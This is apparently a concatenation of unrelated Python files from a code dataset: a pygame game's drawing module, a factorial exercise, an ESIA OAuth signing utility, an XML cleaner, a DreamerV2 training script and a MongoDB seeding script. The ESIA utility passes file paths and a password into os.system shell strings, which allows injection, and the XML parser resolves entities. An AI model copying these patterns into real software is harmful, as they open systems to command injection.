elementSymbols\n\n#used for establishing font sizes (and boldness) for text elementSymbols throughout the game, both fonts are part of a folder containing several 'ubuntu' style fonts\ndef font(size, bold = True): \n\tif bold:\n\t\tfont = pygame.font.Font('/home/lewis/Documents/School/Fusion/External Files/ubuntu-font-family/Ubuntu-M.ttf', size) #ubuntu-M: bold font\n\telse:\n\t\tfont = pygame.font.Font('/home/lewis/Documents/School/Fusion/External Files/ubuntu-font-family/Ubuntu-R.ttf', size) #ubuntu-R: thinner non-bold font\n\n\treturn font\n\n#used for defining text's surface and the area around it\ndef createTextObjects(text, font, colour): \n\ttry:\n\t\ttextSurf = font.render(text, True, colour) #creates a surface for the text to sit on...\n\texcept TypeError: #the render function only takes in Unicode or bytecode, an empty string does not count as this and will through a typeError if this occurs\n\t\ttextSurf = font.render(None, True, colour) #in this case just pass in 'null' which is an acceptable value\n\treturn textSurf, textSurf.get_rect() #returns the surface and a rectangle that surrounds that surface\n\n#used for drawing button elementSymbols\ndef drawButton(outlineColour, outlineCoords, outlineWeight, text, font, textColour):\n\t#create box for button\n\tbuttonRect = pygame.draw.rect(display, outlineColour, outlineCoords, outlineWeight)\n\t#create the text surface and it's respective rectangle for positioning\n\tbuttonTextSurf, buttonTextRect = createTextObjects(text, font, textColour)\n\t#position text in the center of the button's box using the text surface's corresponding rectangle\n\tbuttonTextRect.center = ((outlineCoords[0] + (outlineCoords[2] / 2)), (outlineCoords[1] + (outlineCoords[3] / 2)))\n\t#draw button to display\n\tdisplay.blit(buttonTextSurf, buttonTextRect)\n\t\n\treturn buttonRect #returns the properties of the rectangle so that they can be referred to \n\n#used for 
drawing label elementSymbols\ndef drawLabel(text, font, colour, coords):\n\t#create the text surface and it's respective rectangle for positioning\n\tlabelTextSurf, labelTextRect = createTextObjects(text, font, colour)\n\t#position the label using the text surface's corresponding rectangle\n\tlabelTextRect.center = coords\n\t#draw button to display\n\tdisplay.blit(labelTextSurf, labelTextRect)\n\n\treturn labelTextRect #returns the properties of the rectangle so that they can be referred to \n\n#used for drawing input box elementSymbols (very similiar to a button but text is dynamic) \ndef drawInputBox(outlineColour, outlineCoords, outlineWeight, font, textColour, text = ''):\n\t#create box for input box\n\tinputBoxRect = pygame.draw.rect(display, outlineColour, outlineCoords, outlineWeight)\n\t#create the text surface and it's respective rectangle for positioning\n\tinputBoxTextSurf, inputBoxTextRect = createTextObjects(text, font, textColour)\n\t#position text in the center of the input box using the text surface's corresponding rectangle\n\tinputBoxTextRect.center = ((outlineCoords[0] + (outlineCoords[2] / 2)), (outlineCoords[1] + (outlineCoords[3] / 2)))\n\t#draw input box to display\n\tdisplay.blit(inputBoxTextSurf, inputBoxTextRect)\n\t\n\treturn inputBoxRect #returns the properties of the rectangle so that they can be referred to\n\n#used for drawing the header elements on the game screen\ndef drawGameScreenHeader(username, level, score, highscore):\n\tfeatureList = [drawLabel(username, font(25), BLACK, (100, 40)), #draw 'Username' label\n\t\t\t\t drawLabel(level, font(30), BLACK, ((DISPLAY_WIDTH / 2), 60)), #draw 'Level Number' label\n\t\t\t\t drawLabel(score, font(25), BLACK, (400, 40)), #draw 'Score' label\n\t\t\t\t drawLabel(highscore, font(25), BLACK, (400, 90)), #draw 'Highscore' label\n\t\t\t\t drawButton(BLACK, [50, 70, 120, 40], 3, 'Options', font(25), BLACK)] #draw 'Options' button\n\n\treturn featureList #returns the properties of the various elements on this screen to the loop function so that things such as button clicks can be listened for\n\n#used for drawing the game board grid on the game screen\ndef drawGameBoard():\n\tpygame.draw.rect(display, BLACK, [50, 150, 400, 400], 5) #draw the grid square\n\tfor yCoord in range(230, 550, 80):\n\t\tpygame.draw.line(display, BLACK, (50, yCoord), (450, yCoord), 3) #draw the horizontal grid lines\n\tfor xCoord in range(130, 450, 80):\n\t\tpygame.draw.line(display, BLACK, (xCoord, 150), (xCoord, 550), 3) #draw the vertical grid lines\n\t\n#used for drawing the tiles onto the game board grid\ndef drawTiles(gameboard):\n\tfor tile in gameboard.tiles: #for each tileon the board...\n\t\tlocation = gridDictCoords[tile.location] #...find the centre of the cell which it needs to be drawn onto...\n\t\tcolour = tileColours[gameboard.level - 1][(tile.element - 1) % 11] #...and select the appropriate colour for tile\n\n\t\tstartX = gridDictCoords[tile.location][0] - 37 #set the x...\n\t\tstartY = gridDictCoords[tile.location][1] - 37 #...and y coordinate for the top left pixel of the tile\n\t\twidth = gridDictDimensions[tile.location][0] #set the width...\n\t\theight = gridDictDimensions[tile.location][1] #...and height for the tile, depending on where the tile has to be drawn this will change due to the thickness of grid lines around it\n\n\t\ttileRect = pygame.draw.rect(display, colour, [startX, startY, width, height]) #draw the tile rectangle \n\t\tdrawLabel(str(elementSymbols[tile.element - 1]), font(25), BLACK, 
(gridDictCoords[tile.location][0], gridDictCoords[tile.location][1] - 15)) #draw the element name onto the tile\n\t\tdrawLabel(str(tile.element), font(25), BLACK, (gridDictCoords[tile.location][0], gridDictCoords[tile.location][1] + 20)) #draw the element number onto the tile\n\n#used for drawing the elements that make up the game screen whilst the 'gameLoop' is running\ndef drawGameScreen(gameboard):\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\twith open('/home/lewis/Documents/School/Fusion/External Files/Leaderboard.pickle', 'rb') as file: #open leaderboard file\n\t\ttry: \n\t\t\tnamesAndScores = pickle.load(file) #get names and scores from 'leaderboard' file...\n\t\t\thighScore = namesAndScores[-1][1] #...and get the highscore from the list of names and scores\n\t\texcept EOFError: #unless the file is empty...\n\t\t\thighScore = 0 #...in which case just set the highscore to 0\n\t\tfeatures = drawGameScreenHeader(gameboard.username, 'LVL {}'.format(str(gameboard.level)), 'Score: {}'.format(str(gameboard.score)), 'Hi-Score: {}'.format(highScore)) #draw the header \n\tdrawGameBoard() #draw the board\n\tdrawTiles(gameboard) #draw the tiles\n\n\treturn features #return properties of all elements\n\n#used for drawing the elements that make up the main menu screen whilst the 'mainMenuLoop' is running\ndef drawMainMenuScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\tdrawLabel('Fusion', font(140, True), (178, 34, 34), (DISPLAY_WIDTH / 2, 150)) #draw title screen header\n\n\tfeatureList = [drawButton(BLACK, [125, 320, 250, 50], 3, 'New Game', font(25), BLACK), #draw 'New Game' button\n\t\t\t\t drawButton(BLACK, [125, 380, 250, 50], 3, 'Load Game', font(25), BLACK), #draw 'Load Game' button\n\t\t\t\t drawButton(BLACK, [125, 440, 250, 50], 3, 'Leaderboard', font(25), BLACK), #draw 'Leaderboard' button\n\t\t\t\t drawButton(BLACK, [125, 500, 250, 50], 3, 'Instructions', font(25), BLACK)] #draw 'Instructions' button\n\n\treturn featureList #return properties of all elements\n\n#used for drawing the elements that make up the instructions screen whilst the 'instructionsLoop' is running\ndef drawInstructionsScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\timg = pygame.image.load('/home/lewis/Documents/School/Fusion/External Files/Instructions Screen.png')\n\n\tdisplay.blit(img, (35,0))\n\n\tfeatureList = [drawButton(BLACK, [360, 5, 130, 35], 3, 'BACK', font(25), BLACK)]\n\n\treturn featureList #return properties of all elements\n\n#used for drawing the elements that make up the name input screen whilst the 'nameInputLoop' is running\ndef drawNameInputScreen(newGame, username):\n\tdisplay.fill(WHITE) #wipe the display before updating pixels\n\n\t#the only element that changes when drawing this screen is the text on the button used to submit the username and proceed to the game \n\tif newGame:\n\t\tfeatureList = [drawLabel('Please enter a username between 3 and', font(25), BLACK, (250, 235)), #draw prompt text\n\t\t\t\t\t drawLabel('8 characters long', font(25), BLACK, (250, 270)), #draw prompt text\n\t\t\t\t\t drawInputBox(BLACK, [150, 310, 200, 30], 2, font(25), BLACK, username), #draw input box\n\t\t\t\t\t drawButton(BLACK, [150, 365, 200, 30], 3, 'Start Game', font(25), BLACK), #draw 'Start Game' button\n\t\t\t\t\t drawButton(BLACK, [320, 35, 130, 35], 3, 'BACK', font(25), BLACK)] #draw 'Back' button\n\telse:\n\t\tfeatureList = [drawLabel('Please enter the username from your', font(25), BLACK, (250, 235)), #draw prompt text\n\t\t\t\t\t 
drawLabel('previous game.', font(25), BLACK, (250, 270)), #draw prompt text\n\t\t\t\t\t drawInputBox(BLACK, [150, 310, 200, 30], 2, font(25), BLACK, username), #draw input box\n\t\t\t\t\t drawButton(BLACK, [150, 365, 200, 30], 3, 'Continue Game', font(25), BLACK), #draw 'Continue Game' button\n\t\t\t\t\t drawButton(BLACK, [320, 35, 130, 35], 3, 'BACK', font(25), BLACK)] #draw 'Back' button\n\n\treturn featureList #return properties of all elements\n\n#draws the leaderboard grid that the leaderboard contents will populate\ndef drawLeaderboardGrid():\n\tpygame.draw.rect(display, BLACK, [50, 90, 400, 475], 5) #draw rectangle that leaderboard gird will be drawn in\n\t\n\tfor yCoord in range(565, 90, -43):\n\t\tpygame.draw.line(display, BLACK, (50, yCoord), (450, yCoord), 3) #draw horizontal grid lines\n\tpygame.draw.line(display, BLACK, (90, 90), (90, 565), 3) #draw the vertical line seperating the 'numbers' column and the 'username' column\n\tpygame.draw.line(display, BLACK, (270, 90), (270, 565), 3) #draw the vertical line seperating the 'username' column and the 'score' column\n\n#draws the contents that fill the leaderboard grid\ndef drawLeaderboardContents():\n\tdrawLabel('Username', font(25), BLACK, (175, 110)) #draw the column header for the 'username' column\n\tdrawLabel('Score', font(25), BLACK, (355, 110)) #draw the column header for the 'score' column\n\n\tnumCol = ['#', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10'] #the hash will be the column header for the 'numbers' column with the numbers themselves populating the rows of the column\n\trow = 1 #start at the first row\n\tfor yCoord in range(110, 545, 43):\n\t\tdrawLabel(numCol[row - 1], font(25), BLACK, (70, yCoord)) #for each row draw the corresponding number in the correct place on the grid\n\t\trow += 1 #incrememnt row\n\n\twith open('/home/lewis/Documents/School/Fusion/External Files/Leaderboard.pickle', 'rb') as file: #open the 'leaderboard' file\n\t\ttry: \n\t\t\tnamesAndScores = pickle.load(file) #load up the scores...\n\t\t\tnamesAndScores.reverse() #... 
and reverse the list so that the highest score is the first element\n\t\texcept EOFError: #unless there are no scores in the file...\n\t\t\tnamesAndScores = [] #...in which case, the list is just empty\n\tentry = 0\n\tfor yCoord in range(153, 545, 43): #for each row...\n\t\tif entry < len(namesAndScores): #...if there is still place on the table...\n\t\t\tdrawLabel(namesAndScores[entry][0], font(25, False), BLACK, (175, yCoord)) #...then draw the appropriate username onto the appropriate row and column...\n\t\t\tdrawLabel(str(namesAndScores[entry][1]), font(25, False), BLACK, (355, yCoord)) #...and the appropriate score onto the appropriate row and column\n\t\t\tentry += 1 #increment entry number\n\n#used for drawing the elements that make up the instructions screen whilst the 'leaderboardLoop' is running\ndef drawLeaderboardScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\tdrawLeaderboardGrid() #draw the leaderboard grid\n\n\tfeatureList = [drawLabel('Leaderboard', font(40), BLACK, (155, 50)), #draw the leaderboard header \n\t\t\t\t drawButton(BLACK, [320, 35, 130, 35], 3, 'BACK', font(25), BLACK)] #draw the 'back' button\n\n\tdrawLeaderboardContents() #draw the contents of the leaderboard into the leaderboard grid\n\n\treturn featureList #return properties of all elements\n\n#used for drawing the elements that make up the options screen whilst the 'optionsLoop' is running\ndef drawOptionsScreen():\n\tdisplay.fill(WHITE) #wipe screen before updating pixels\n\n\tfeatureList = [drawLabel('Options', font(60), BLACK, (DISPLAY_WIDTH / 2, 85)), #draw the options header\n\t\t\t\t drawButton(BLACK, [160, 230, 190, 60], 3, 'LEADERBOARD', font(25), BLACK), #draw the 'leaderboard' button\n\t\t\t\t drawButton(BLACK, [160, 330, 190, 60], 3, 'MAIN MENU', font(25), BLACK), #draw the 'main menu' button\n\t\t\t\t drawButton(BLACK, [160, 430, 190, 60], 3, 'CONTINUE', font(25), BLACK)] #draw the 'continue' button\n\n\treturn featureList #return properties of all elements","repo_name":"lewismazzei/Fusion","sub_path":"Code/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34817355029","text":"\"\"\"\nAccept a number and print the factorial of the same.\n\"\"\"\n\nuser_input = num = int(input('Enter a number: '))\n\nfact = 1\nwhile num >= 1:\n fact *= num # fact = fact * num\n num -= 1 # num = num - 1\n\nprint('factorial of', user_input, 'is', fact)\n\n# 5! + 4! + 3! + 2! 
=?\n","repo_name":"kayartaya-vinod/2020-AUG-ABB-PYTHON","sub_path":"Examples/ex04.py","file_name":"ex04.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41029006248","text":"import base64\nimport datetime\nimport json\nimport os\nimport tempfile\n\nimport pytz\n\nimport requests\n\nfrom .exceptions import CryptoBackendError, HttpError, IncorrectJsonError\n\n\ndef make_request(url, method='GET', headers=None, data=None, verify=True):\n \"\"\"\n Выполняет запрос по заданному URL и возвращает dict на основе JSON-ответа\n\n :param str url: URL-адрес\n :param str method: (optional) HTTP-метод запроса, по умолчанию GET\n :param dict headers: (optional) массив HTTP-заголовков, по умолчанию None\n :param dict data: (optional) массив данных передаваемых в запросе,\n по умолчанию None\n :param boolean verify: optional, производить ли верификацию\n ssl-сертификата при запросае\n :return: dict на основе JSON-ответа\n :rtype: dict\n :raises HttpError: если выбрасыватеся исключение requests.HTTPError\n :raises IncorrectJsonError: если JSON-ответ не может быть\n корректно прочитан\n \"\"\"\n try:\n response = requests.request(\n method, url, headers=headers, data=data, verify=verify)\n response.raise_for_status()\n return json.loads(response.content)\n except requests.HTTPError as e:\n raise HttpError(e)\n except ValueError as e:\n raise IncorrectJsonError(e)\n\n\ndef smime_sign(certificate_file, private_key_file, data, backend='m2crypto'):\n \"\"\"\n Подписывает данные в формате SMIME с использование sha256.\n В качестве бэкенда используется либо вызов openssl, либо\n библиотека M2Crypto\n\n :param str certificate_file: путь к сертификату\n :param str private_key_file: путь к приватному ключу\n :param str data: подписываемые данные\n :param str backend: (optional) бэкенд, используемый\n для подписи (m2crypto|openssl)\n :raises CryptoBackendError: если неверно указан backend\n :return: ��ткрепленная подпись\n :rtype: str\n \"\"\"\n if backend == 'm2crypto' or backend is None:\n from M2Crypto import SMIME, BIO\n\n if not isinstance(data, bytes):\n data = bytes(data)\n\n signer = SMIME.SMIME()\n signer.load_key(private_key_file, certificate_file)\n p7 = signer.sign(\n BIO.MemoryBuffer(data), flags=SMIME.PKCS7_DETACHED, algo='sha256')\n signed_message = BIO.MemoryBuffer()\n p7.write_der(signed_message)\n return signed_message.read()\n elif backend == 'openssl':\n source_file = tempfile.NamedTemporaryFile(mode='w', delete=False)\n source_file.write(data)\n source_file.close()\n source_path = source_file.name\n\n destination_file = tempfile.NamedTemporaryFile(mode='wb', delete=False)\n destination_file.close()\n destination_path = destination_file.name\n\n cmd = (\n 'openssl smime -sign -md sha256 -in {f_in} -signer {cert} -inkey '\n '{key} -out {f_out} -outform DER')\n os.system(cmd.format(\n f_in=source_path,\n cert=certificate_file,\n key=private_key_file,\n f_out=destination_path,\n ))\n\n signed_message = open(destination_path, 'rb').read()\n os.unlink(source_path)\n os.unlink(destination_path)\n return signed_message\n else:\n raise CryptoBackendError(\n 'Unknown cryptography backend. 
Use openssl or m2crypto value.')\n\n\ndef csp_sign(thumbprint, password, data):\n \"\"\"\n Подписывает данные с использованием ГОСТ Р 34.10-2012 открепленной подписи.\n В качестве бэкенда используется утилита cryptcp из ПО КриптоПРО CSP.\n\n :param str thumbprint: SHA1 отпечаток сертификата, связанного\n с зкарытым ключем\n :param str password: пароль для контейнера закрытого ключа\n :param str data: подписываемые данные\n \"\"\"\n tmp_dir = tempfile.gettempdir()\n source_file = tempfile.NamedTemporaryFile(\n mode='w', delete=False, dir=tmp_dir)\n source_file.write(data)\n source_file.close()\n source_path = source_file.name\n destination_path = source_path + '.sgn'\n\n cmd = (\n \"cryptcp -signf -norev -dir {tmp_dir} -der -strict -cert -detached \"\n \"-thumbprint {thumbprint} -pin '{password}' {f_in} 2>&1 >/dev/null\")\n os.system(cmd.format(\n tmp_dir=tmp_dir,\n thumbprint=thumbprint,\n password=password,\n f_in=source_path\n ))\n\n signed_message = open(destination_path, 'rb').read()\n os.unlink(source_path)\n os.unlink(destination_path)\n return signed_message\n\n\ndef sign_params(params, settings, backend='csp'):\n \"\"\"\n Подписывает параметры запроса и добавляет в params ключ client_secret.\n Подпись основывается на полях: `scope`, `timestamp`, `client_id`, `state`.\n\n :param dict params: параметры запроса\n :param EsiaSettings settings: настройки модуля ЕСИА\n :param str backend: (optional) бэкенд используемый\n для подписи (m2crypto|openssl|csp)\n :raises CryptoBackendError: если неверно указан backend\n :return: подписанные параметры запроса\n :rtype: dict\n \"\"\"\n plaintext = params.get('scope', '') + params.get('timestamp', '') + \\\n params.get('client_id', '') + params.get('state', '')\n if backend == 'csp':\n raw_client_secret = csp_sign(\n settings.csp_cert_thumbprint,\n settings.csp_container_pwd, plaintext)\n else:\n raw_client_secret = smime_sign(\n settings.certificate_file, settings.private_key_file,\n plaintext, backend)\n params.update(\n client_secret=base64.urlsafe_b64encode(\n raw_client_secret).decode('utf-8'),\n )\n return params\n\n\ndef get_timestamp():\n \"\"\"\n Возвращает текущую дату и время в строковом представлении с указанем зоны\n в формате пригодном для использования при взаимодействии с ЕСИА\n\n :return: текущая дата и время\n :rtype: str\n \"\"\"\n return datetime.datetime.now(pytz.utc).\\\n strftime('%Y.%m.%d %H:%M:%S %z').strip()\n","repo_name":"sokolovs/esia-oauth2","sub_path":"esia/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"ru","doc_type":"code","stars":34,"dataset":"github-code","pt":"7"} +{"seq_id":"74117014623","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nOverwrite the original xml file with a middle of context line break replaced by a space.\nAlso expand the escaped characters, for example: £ becomes £\n\nLine breaks in text are generally represented as:\n \\r\\n - on a windows computer\n \\r - on an Apple computer\n \\n - on Linux\n\"\"\"\n\nimport re\nimport os\nimport sys\nfrom lxml import etree\n\n\ndef main():\n\n rootdir = \"../xml_files\"\n\n try:\n files = [f for f in os.listdir(rootdir) if os.path.isfile(os.path.join(rootdir, f))]\n except WindowsError:\n print(\"something is wrong\")\n sys.exit(1)\n\n for filename in files:\n filename = os.path.join(rootdir, filename)\n #print(filename)\n p = etree.XMLParser(resolve_entities=True)\n with open(filename, \"rt\") as f:\n tree = etree.parse(f, p)\n\n for node in tree.iter():\n if node.text is not 
None:\n if re.search(\"\\n|\\r|\\r\\n\", node.text.rstrip()):\n node.text = node.text.replace(\"\\r\\n\", \" \")\n node.text = node.text.replace(\"\\r\", \" \")\n node.text = node.text.replace(\"\\n\", \" \")\n\n # because encoding=\"UTF-8\" in below options, the output can contain non-ascii characters, e.g. £\n tree.write(filename, encoding=\"UTF-8\", xml_declaration=True)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"jli755/python_scripts","sub_path":"clean_xml_and_newline.py","file_name":"clean_xml_and_newline.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"15844096386","text":"import jax as jx\nimport jax.numpy as jnp\nfrom jax import jit\nfrom jax.example_libraries import optimizers\nfrom jax.tree_util import register_pytree_node\n\nimport numpy as np\n\nimport json\nimport pickle as pkl\nimport argparse\nimport time\nfrom tqdm import tqdm\nimport os\n\nimport environments\nfrom initialization import get_init_fns\nfrom agent_environment_interaction_loop import get_agent_environment_interaction_loop_function\n\nimport wandb\n\nfrom types import SimpleNamespace\n\n# Tell JAX how to handle SimpleNamespace as a pytree (allows for more compact notation than dicts)\ndef SimpleNamespace_flatten(v):\n return (v.__dict__.values(), v.__dict__.keys())\n\ndef SimpleNamespace_unflatten(aux_data, children):\n return SimpleNamespace(**{k:v for k,v in zip(aux_data, children)})\n\nregister_pytree_node(SimpleNamespace, SimpleNamespace_flatten, SimpleNamespace_unflatten)\n\nactivation_dict = {\"relu\": jx.nn.relu, \"silu\": jx.nn.silu, \"elu\": jx.nn.elu}\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--seed\", \"-s\", type=int, default=0)\nparser.add_argument(\"--group\", \"-g\", type=str, default=None)\nparser.add_argument(\"--output\", \"-o\", type=str, default=\"dreamer.out\")\nparser.add_argument(\"--config\", \"-c\", type=str)\nparser.add_argument(\"--load_checkpoint\", type=str, default=None)\nparser.add_argument(\"--save_checkpoint\", type=str, default=\"checkpoint.pkl\")\nargs = parser.parse_args()\nkey = jx.random.PRNGKey(args.seed)\n\nwith open(args.config, 'r') as f:\n config=json.load(f)\nconfig.update({\"agent_type\":\"dreamerv2\", \"seed\":args.seed})\n\nconfig = SimpleNamespace(**config)\n\nassert(config.training_start_time>config.sequence_length)\n\n########################################################################\n# Define logging and checkpointing functions.\n########################################################################\n\ndef update_log_dict(d, u):\n if d is None:\n for k,v in u.items():\n if(jnp.ndim(v)==0):\n u[k] = jnp.expand_dims(v,axis=0)\n d = u\n else:\n for k,v in u.items():\n if(jnp.ndim(v)==0):\n v = jnp.expand_dims(v,axis=0)\n d[k]=jnp.concatenate([d[k],v])\n return d\n\ndef save_log(log_dicts, config):\n with open(args.output, 'wb') as f:\n data = log_dicts\n data[\"config\"]=config.__dict__\n pkl.dump(data, f)\n\ndef get_log_function(F):\n model_eval = jit(F.model_eval)\n\n def log(S, M, log_dicts, wallclock, key):\n curr_time = S.env_t\n\n # Log returns and associated times\n returns = M[\"return\"][M[\"episode_complete\"]]\n return_times = curr_time-config.eval_frequency+jnp.arange(config.eval_frequency)[M[\"episode_complete\"]]\n for ret, t in zip(returns, return_times):\n wandb.log({\"return\":np.array(ret),\"return_time\":np.array(t)})\n log_dicts[\"returns_and_times\"] = 
update_log_dict(log_dicts[\"returns_and_times\"],{\"return\":returns,\"return_time\":return_times})\n\n # Log model metrics\n key, subkey = jx.random.split(key)\n metrics = model_eval(S.buffer_state,S.model_opt_state,subkey)\n metrics[\"time\"] = curr_time\n metrics[\"time_per_step\"] = wallclock/config.eval_frequency\n wandb.log({key:np.array(value) for key, value in metrics.items()})\n log_dicts[\"metrics\"] = update_log_dict(log_dicts[\"metrics\"],metrics)\n return log_dicts\n return log\n\ndef save_checkpoint(run_state, log_dicts, i, wandb_id, opt_state_names):\n temp_filename = args.save_checkpoint+str(time.time())\n with open(temp_filename, 'wb') as f:\n unpacked_run_state = {}\n for k, v in run_state.__dict__.items():\n if k in opt_state_names:\n unpacked_run_state[k]=optimizers.unpack_optimizer_state(v)\n else:\n unpacked_run_state[k]=v\n pkl.dump({\n 'run_state':unpacked_run_state,\n 'log_dicts':log_dicts,\n 'i':i,\n 'wandb_id':wandb_id\n }, f)\n\n os.rename(temp_filename, args.save_checkpoint)\n\ndef load_checkpoint(opt_state_names):\n with open(args.load_checkpoint, 'rb') as f:\n checkpoint = pkl.load(f)\n run_state = checkpoint[\"run_state\"]\n for k in opt_state_names:\n run_state[k] = optimizers.pack_optimizer_state(run_state[k])\n run_state = SimpleNamespace(**run_state)\n log_dicts = checkpoint[\"log_dicts\"]\n start_i = checkpoint[\"i\"]+1\n wandb_id = checkpoint[\"wandb_id\"]\n return run_state, log_dicts, start_i, wandb_id\n\n########################################################################\n# Initialization\n########################################################################\n\nEnvironment = getattr(environments, config.environment)\nenv_config = config.env_config\n\nenv = Environment(**env_config)\nnum_actions = env.num_actions()\n\n# Initialize run_state and functions\ninit_state, init_functions = get_init_fns(env, config)\nkey, subkey = jx.random.split(key)\nrun_state = init_state(subkey)\nfunctions = init_functions()\nstart_i = 0\nlog_dicts = {\"returns_and_times\":None, \"metrics\":None}\n\nresumed = False\nopt_state_names = [\"V_opt_state\", \"pi_opt_state\", \"model_opt_state\"]\nif(args.load_checkpoint is not None):\n if(os.path.exists(args.load_checkpoint)):\n run_state, log_dicts, start_i, wandb_id = load_checkpoint(opt_state_names)\n resumed = True\n else:\n print(\"Warning! 
load_checkpoint does not exist, starting run from scratch.\")\n\n# Resume wandb session as well if loading from checkpoint\nif(resumed):\n wandb.init(config=config, resume=\"must\", id=wandb_id, project='dreamerv2_pure_jax', group=args.group)\nelse:\n wandb_id = wandb.util.generate_id()\n wandb.init(config=config, id=wandb_id, project='dreamerv2_pure_jax', group=args.group)\n\nlog = get_log_function(functions)\n\n# Build the agent environment interaction loop function\nagent_environment_interaction_loop_function = get_agent_environment_interaction_loop_function(functions, config.eval_frequency, config)\n\n# If the env itself is written in JAX we can compile the interaction loop\nif(config.jax_env):\n agent_environment_interaction_loop_function = jit(agent_environment_interaction_loop_function)\n\ntime_since_checkpoint = 0\nlast_time = time.time()\n\n########################################################################\n# Main training loop\n########################################################################\n\ni = start_i\ntqdm.write(\"Beginning run...\")\nfor i in tqdm(range(start_i,config.num_steps//config.eval_frequency), initial=start_i, total=config.num_steps//config.eval_frequency):\n run_state, metrics = agent_environment_interaction_loop_function(run_state)\n\n ellapsed_time = time.time()-last_time\n last_time = time.time()\n\n run_state.key, subkey = jx.random.split(run_state.key)\n log_dicts = log(run_state, metrics, log_dicts, ellapsed_time, subkey)\n\n # periodically save checkpoint to disk\n time_since_checkpoint+=config.eval_frequency\n if(time_since_checkpoint>=config.checkpoint_frequency):\n save_checkpoint(run_state, log_dicts, i, wandb_id, opt_state_names)\n time_since_checkpoint = 0\n\n# Save Data and final checkpoint\nsave_log(log_dicts, config)\nsave_checkpoint(run_state, log_dicts, i, wandb_id, opt_state_names)\nwandb.finish()\n","repo_name":"kenjyoung/dreamerv2_JAX","sub_path":"dreamer_single_seed.py","file_name":"dreamer_single_seed.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"41298135456","text":"from data.users import *\r\nfrom data.admins import *\r\nfrom data.locations import *\r\nfrom data.devices import *\r\nimport mongoengine\r\nimport random as r\r\nimport names\r\nimport csv\r\n\r\n\r\nmongoengine.register_connection(alias='core', name=\"test\")\r\n\r\n# ###################################################\r\n# #################### user data ####################\r\n# ###################################################\r\n\r\nfile = open(\"data.csv\")\r\ncsvreader = csv.reader(file)\r\nheader = next(csvreader)\r\nprint(header)\r\nrows = []\r\nfor row in csvreader:\r\n loc = Location()\r\n loc.lat = float(row[3])\r\n loc.lon = float(row[4])\r\n loc.address = row[2]\r\n loc.save()\r\n\r\n user = User()\r\n user.natId = row[0]\r\n user.firstName = names.get_first_name()\r\n user.lastName = names.get_last_name()\r\n user.email = row[1]+\"@yahoo.com\"\r\n ph_number = \"+\" + str(r.randint(6, 9))\r\n for i in range(1, 10):\r\n ph_number += str(r.randint(0, 9))\r\n user.phone = ph_number\r\n user.address = row[2]\r\n\r\n if r.randint(6, 9) % 2 == 0:\r\n user.testRes = True\r\n device = Device()\r\n device.ownerNatId = user.natId\r\n dId = \"\"\r\n for i in range(1, 10):\r\n dId += str(r.randint(0, 9))\r\n device.deviceId = dId\r\n device.save()\r\n user.deviceId =device.id\r\n else:\r\n user.testRes = False\r\n\r\n if r.randint(6, 9)%2 == 0:\r\n 
user.gender = \"male\"\r\n    else:\r\n        user.gender = \"female\"\r\n    user.location = loc.id\r\n    print(user)\r\n    user.save()\r\nfile.close()\r\n\r\n\r\n\r\nuser2 = User()\r\nuser2.firstName = \"mohsen\"\r\nuser2.lastName = \"dh\"\r\nuser2.email = \"dh@yahoo.com\"\r\nuser2.phone = \"+98030152570\"\r\nuser2.testRes = False\r\nuser2.address = \"tehran - ... - 1\"\r\nuser2.gender = \"male\"\r\nuser2.natId = \"2910....97\"\r\nuser2.save()\r\n\r\nuser3 = User()\r\nuser3.firstName = \"reyhane\"\r\nuser3.lastName = \"barfeh\"\r\nuser3.email = \"fateme_akbari@yahoo.com\"\r\nuser3.phone = \"+98030152572\"\r\nuser3.testRes = False\r\nuser3.address = \"tehran - ... - 1\"\r\nuser3.gender = \"female\"\r\nuser3.natId = \"2910....98\"\r\nuser3.save()\r\n\r\n# ###################################################\r\n# #################### admin data ###################\r\n# ###################################################\r\n#\r\nadmin = Admin()\r\nadmin.firstName = \"admin1\"\r\nadmin.lastName = \"admin1\"\r\nadmin.email = \"mohsen_d98@yahoo.com\"\r\nadmin.phone = \"+9803015****\"\r\nadmin.address = \"tehran - ... - 1\"\r\nadmin.gender = \"male\"\r\nadmin.natId = \"2910....96\"\r\nadmin.save()\r\n\r\nadmin2 = Admin()\r\nadmin2.firstName = \"admin2\"\r\nadmin2.lastName = \"admin2\"\r\nadmin2.email = \"alireza@yahoo.com\"\r\nadmin2.phone = \"+9803015****\"\r\nadmin2.address = \"tehran - ... - 1\"\r\nadmin2.gender = \"male\"\r\nadmin2.natId = \"2910....97\"\r\nadmin2.save()\r\n\r\nadmin3 = Admin()\r\nadmin3.firstName = \"admin3\"\r\nadmin3.lastName = \"admin3\"\r\nadmin3.email = \"fateme_akbari@yahoo.com\"\r\nadmin3.phone = \"+9803015****\"\r\nadmin3.address = \"tehran - ... - 1\"\r\nadmin3.gender = \"female\"\r\nadmin3.natId = \"2910....98\"\r\nadmin3.save()\r\n","repo_name":"mohsenD98/iust-covid-database","sub_path":"python/DB/pushData.py","file_name":"pushData.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74433288543","text":"import speech_recognition as sr\nfrom gtts import gTTS\nimport playsound\nimport time\nfrom time import ctime\nimport os\n\ndef listen():\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"I am listening..\")\n        audio = r.listen(source, phrase_time_limit = 5)\n    data = \"\"\n    try:\n        data = 